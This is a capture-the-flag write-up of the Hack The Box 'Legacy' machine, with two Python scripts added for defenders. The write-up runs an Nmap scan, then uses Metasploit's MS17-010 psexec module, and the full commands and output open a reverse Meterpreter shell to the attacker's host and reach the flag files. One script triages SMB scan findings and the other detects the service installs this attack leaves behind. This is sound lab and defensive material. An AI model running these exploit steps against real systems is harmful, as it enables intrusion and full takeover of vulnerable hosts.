I first started by running Nmap against the host to discover the running services:
# Nmap 7.80 scan initiated Tue Sep 15 14:12:48 2020 as: nmap -O -sV -sC -p- -oN scan 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up (0.019s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows 2000 SP4 (91%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h29m49s, deviation: 2h07m16s, median: 4d22h59m49s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:df:de (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2020-09-20T23:14:42+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep 15 14:15:43 2020 -- 1 IP address (1 host up) scanned in 175.19 seconds
We can see from this output that two ports are open, 139 and 445. The SMB discovery scripts also ran and confirmed the service was up, although there were no SMB shares.
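The scan output above carries more than the two open ports: the SMB scripts name the OS, report that message signing is disabled, show that a guest session was accepted, and fail to negotiate SMB2. The following Python script is an added example, not part of this writeup. It parses the Nmap normal-output format shown above (SAMPLE_REPORT is an abridged copy of that scan) and turns the port table and script results into findings a defender would act on; the regexes, finding codes and severity labels are this example's own choices.

```python
"""Triage an Nmap normal-output (-oN) report for SMB exposure findings.

Added example, not part of the original writeup. SAMPLE_REPORT is an
abridged copy of the scan output on the page; the regexes, finding codes
and severity labels below are this example's own choices.
"""
import re

SAMPLE_REPORT = """\
Nmap scan report for 10.10.10.4
Host is up (0.019s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Host script results:
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
SCRIPT_LINE_RE = re.compile(r"^\|_?\s*(.*)$")
# NSE script names are lowercase letters, digits and hyphens; result fields
# such as "OS", "account_used" or "Computer name" never match this shape.
SCRIPT_NAME_RE = re.compile(r"^([a-z][a-z0-9-]*):\s*(.*)$")
FIELD_RE = re.compile(r"^([^:]+):\s*(.*)$")

# Windows releases that had reached end of support by the 2020 scan date.
EOL_OS = ("Windows XP", "Windows 2000", "Windows Server 2003")


def parse_report(text):
    """Parse one host's report into host, ports and script results.

    ports maps port number -> (state, service, version); scripts maps
    script name -> {field: value}, with any text that follows the script
    name on the same line stored under the key "_".
    """
    report = {"host": None, "ports": {}, "scripts": {}}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Nmap scan report for "):
            report["host"] = line.split()[-1]
            continue
        m = PORT_RE.match(line)
        if m:
            port, _proto, state, service, version = m.groups()
            report["ports"][int(port)] = (state, service, version)
            continue
        m = SCRIPT_LINE_RE.match(line)
        if not m:
            continue  # not a script-output line
        body = m.group(1)
        m = SCRIPT_NAME_RE.match(body)
        if m:
            current = m.group(1)
            report["scripts"][current] = {}
            if m.group(2):
                report["scripts"][current]["_"] = m.group(2)
            continue
        m = FIELD_RE.match(body)
        if m and current is not None:
            report["scripts"][current][m.group(1)] = m.group(2)
    return report


def assess(report):
    """Return (severity, code, message) findings for a parsed report."""
    findings = []
    smb_ports = [p for p in (139, 445)
                 if report["ports"].get(p, ("",))[0] == "open"]
    if smb_ports:
        findings.append(("info", "smb-exposed",
                         "SMB reachable on ports %s" % ", ".join(map(str, smb_ports))))
    scripts = report["scripts"]
    os_name = scripts.get("smb-os-discovery", {}).get("OS", "")
    if any(eol in os_name for eol in EOL_OS):
        findings.append(("high", "eol-os",
                         "SMB reports an end-of-life OS: %s" % os_name))
    mode = scripts.get("smb-security-mode", {})
    if mode.get("message_signing", "").startswith("disabled"):
        findings.append(("medium", "signing-disabled",
                         "SMB message signing disabled (relay/tampering risk)"))
    if mode.get("account_used") == "guest":
        findings.append(("medium", "guest-session",
                         "SMB accepted a guest session for script enumeration"))
    if "negotiation failed" in scripts.get("smb2-time", {}).get("_", ""):
        findings.append(("high", "smbv1-only",
                         "SMB2 negotiation failed: host likely speaks SMBv1 only"))
    return findings


if __name__ == "__main__":
    for severity, code, message in assess(parse_report(SAMPLE_REPORT)):
        print("[%s] %s: %s" % (severity.upper(), code, message))
```

Run it against any `-oN` file with the SMB scripts enabled; a patched host that negotiates SMB2, requires signing and rejects guest sessions yields only the informational "smb-exposed" line.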
EternalBlue (MS17-010) is one of the more common exploits for SMB, especially given that the OS is Windows XP. I started Metasploit, loaded the MS17-010 psexec module and ran it:
msf5 > use windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf5 exploit(windows/smb/ms17_010_psexec) > set lhost 10.10.14.16
lhost => 10.10.14.16
msf5 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.10.14.16:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 - [*] Preparing dynamite...
[*] 10.10.10.4:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x82256da8
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... KpPkSPCi.exe
[*] 10.10.10.4:445 - Created \KpPkSPCi.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \KpPkSPCi.exe...
[*] Meterpreter session 1 opened (10.10.14.16:4444 -> 10.10.10.4:1033) at 2020-09-15 15:26:50 -0400
meterpreter >
meterpreter > cd /
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 0 fil 2017-03-16 01:30:44 -0400 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2017-03-16 01:30:44 -0400 CONFIG.SYS
40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 Documents and Settings
100444/r--r--r-- 0 fil 2017-03-16 01:30:44 -0400 IO.SYS
100444/r--r--r-- 0 fil 2017-03-16 01:30:44 -0400 MSDOS.SYS
100555/r-xr-xr-x 47564 fil 2008-04-13 16:13:04 -0400 NTDETECT.COM
40555/r-xr-xr-x 0 dir 2017-03-16 01:20:57 -0400 Program Files
40777/rwxrwxrwx 0 dir 2017-03-16 01:20:30 -0400 System Volume Information
40777/rwxrwxrwx 0 dir 2017-03-16 01:18:34 -0400 WINDOWS
100666/rw-rw-rw- 211 fil 2017-03-16 01:20:02 -0400 boot.ini
100444/r--r--r-- 250048 fil 2008-04-13 18:01:44 -0400 ntldr
60401544/r-xr--r-- 48691528838709231 fif 1551977431-11-15 22:18:24 -0500 pagefile.sys
100666/rw-rw-rw- 0 fil 2020-09-20 17:03:03 -0400 pwned.txt
meterpreter > cd Documents\ and\ Settings
meterpreter > ls
Listing: C:\Documents and Settings
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Administrator
40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 All Users
40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 Default User
40777/rwxrwxrwx 0 dir 2017-03-16 01:32:52 -0400 LocalService
40777/rwxrwxrwx 0 dir 2017-03-16 01:32:42 -0400 NetworkService
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 john
meterpreter > cd john
meterpreter > ls
Listing: C:\Documents and Settings\john
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Application Data
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Cookies
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Desktop
40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Favorites
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Local Settings
40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 My Documents
100666/rw-rw-rw- 524288 fil 2017-03-16 01:33:41 -0400 NTUSER.DAT
100666/rw-rw-rw- 1024 fil 2017-03-16 01:33:41 -0400 NTUSER.DAT.LOG
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 NetHood
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 PrintHood
40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Recent
40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 SendTo
40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Start Menu
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Templates
100666/rw-rw-rw- 178 fil 2017-03-16 01:33:42 -0400 ntuser.ini
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Documents and Settings\john\Desktop
===============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-03-16 02:19:32 -0400 user.txt
meterpreter > cat user.txt
[REDACTED]
meterpreter >
From this output, you can see the exploit ran successfully and I was given a Meterpreter shell. From this shell I was able to browse to the Desktop of the john user and read the user flag.
I next tried to browse to the Administrator desktop and was able to do this as well, allowing me to also capture the root flag.
meterpreter > cd /
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 0 fil 2017-03-16 01:30:44 -0400 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2017-03-16 01:30:44 -0400 CONFIG.SYS
40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 Documents and Settings
100444/r--r--r-- 0 fil 2017-03-16 01:30:44 -0400 IO.SYS
100444/r--r--r-- 0 fil 2017-03-16 01:30:44 -0400 MSDOS.SYS
100555/r-xr-xr-x 47564 fil 2008-04-13 16:13:04 -0400 NTDETECT.COM
40555/r-xr-xr-x 0 dir 2017-03-16 01:20:57 -0400 Program Files
40777/rwxrwxrwx 0 dir 2017-03-16 01:20:30 -0400 System Volume Information
40777/rwxrwxrwx 0 dir 2017-03-16 01:18:34 -0400 WINDOWS
100666/rw-rw-rw- 211 fil 2017-03-16 01:20:02 -0400 boot.ini
100444/r--r--r-- 250048 fil 2008-04-13 18:01:44 -0400 ntldr
60401544/r-xr--r-- 48691528838709231 fif 1551977431-11-15 22:18:24 -0500 pagefile.sys
100666/rw-rw-rw- 0 fil 2020-09-20 17:03:03 -0400 pwned.txt
meterpreter > cd Documents\ and\ Settings
meterpreter > ls
Listing: C:\Documents and Settings
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Administrator
40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 All Users
40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 Default User
40777/rwxrwxrwx 0 dir 2017-03-16 01:32:52 -0400 LocalService
40777/rwxrwxrwx 0 dir 2017-03-16 01:32:42 -0400 NetworkService
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 john
meterpreter > cd Administrator
meterpreter > ls
Listing: C:\Documents and Settings\Administrator
================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 Application Data
40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Cookies
40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Desktop
40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 Favorites
40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Local Settings
40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 My Documents
100666/rw-rw-rw- 786432 fil 2017-03-16 02:07:20 -0400 NTUSER.DAT
100666/rw-rw-rw- 1024 fil 2017-03-16 02:07:20 -0400 NTUSER.DAT.LOG
40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 NetHood
40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 PrintHood
40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 Recent
40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 SendTo
40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 Start Menu
40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Templates
100666/rw-rw-rw- 178 fil 2017-03-16 02:07:21 -0400 ntuser.ini
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-03-16 02:18:19 -0400 root.txt
meterpreter > cat root.txt
[REDACTED]
meterpreter >
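The Metasploit session above leaves a visible trace on the host: it uploads a randomly named executable (KpPkSPCi.exe), starts it as a service, and deletes the file again a moment later. On Windows that service start is recorded by the Service Control Manager as a "service was installed" event (System log, Event ID 7045), and the random name is what stands out. The following Python script is an added example, not part of this writeup; it scores 7045 records for random-looking executable and service names. SAMPLE_EVENTS is constructed to mimic 7045 fields (the service name XhbGqRta and the directory of the dropped file are assumed, since the page shows only the file name), and the name heuristic and thresholds are this example's own.

```python
"""Flag service installations whose binary or service name looks random.

Added example, not part of the original writeup. SAMPLE_EVENTS is
constructed (not real logs); its field names follow Event ID 7045. The
heuristic below is this example's own and needs an allowlist in practice.
"""
import re

# Constructed sample events: one dropped payload among routine installs.
SAMPLE_EVENTS = [
    {"time": "2020-09-15 15:20:01", "event_id": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\WINDOWS\system32\spoolsv.exe", "AccountName": "LocalSystem"},
    {"time": "2020-09-15 15:22:14", "event_id": 7045, "ServiceName": "VendorAgent",
     "ImagePath": r'"C:\Program Files\Vendor\agent.exe" -svc', "AccountName": "LocalSystem"},
    # Service name and directory are assumed; the file name is the one on the page.
    {"time": "2020-09-15 15:26:49", "event_id": 7045, "ServiceName": "XhbGqRta",
     "ImagePath": r"C:\WINDOWS\KpPkSPCi.exe", "AccountName": "LocalSystem"},
    {"time": "2020-09-15 15:26:50", "event_id": 7036, "ServiceName": "XhbGqRta",
     "ImagePath": "", "AccountName": ""},  # state change, not an install
]

EXE_RE = re.compile(r'([^\\/"]+\.exe)', re.IGNORECASE)


def looks_random(name):
    """Heuristic: short, all-letter, mixed-case name with frequent case
    changes and few vowels, as tool-generated names tend to be."""
    if not (6 <= len(name) <= 12 and name.isalpha()):
        return False
    if name.lower() == name or name.upper() == name:
        return False  # single-case words are usually real names
    changes = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    vowels = sum(ch in "aeiouAEIOU" for ch in name)
    return changes >= 3 and vowels <= len(name) // 3


def suspicious_service_installs(events, known_good=frozenset()):
    """Return (time, service name, image path, reasons) for 7045 events
    whose binary or service name looks random; known_good holds lowercase
    executable names to skip."""
    hits = []
    for ev in events:
        if ev.get("event_id") != 7045:
            continue
        image = ev.get("ImagePath", "")
        m = EXE_RE.search(image)
        base = m.group(1) if m else image.rsplit("\\", 1)[-1]
        if base.lower() in known_good:
            continue
        stem = base[:-4] if base.lower().endswith(".exe") else base
        reasons = []
        if looks_random(stem):
            reasons.append("random-looking executable name")
        if looks_random(ev.get("ServiceName", "")):
            reasons.append("random-looking service name")
        if reasons:
            hits.append((ev["time"], ev.get("ServiceName"), image, reasons))
    return hits


if __name__ == "__main__":
    for when, svc, image, reasons in suspicious_service_installs(SAMPLE_EVENTS):
        print("%s %s %s: %s" % (when, svc, image, "; ".join(reasons)))
```

The heuristic will also catch legitimate mixed-case names with few vowels, so in practice it belongs behind an allowlist of known executables and is best used to prioritise 7045 events for review rather than to alert on its own.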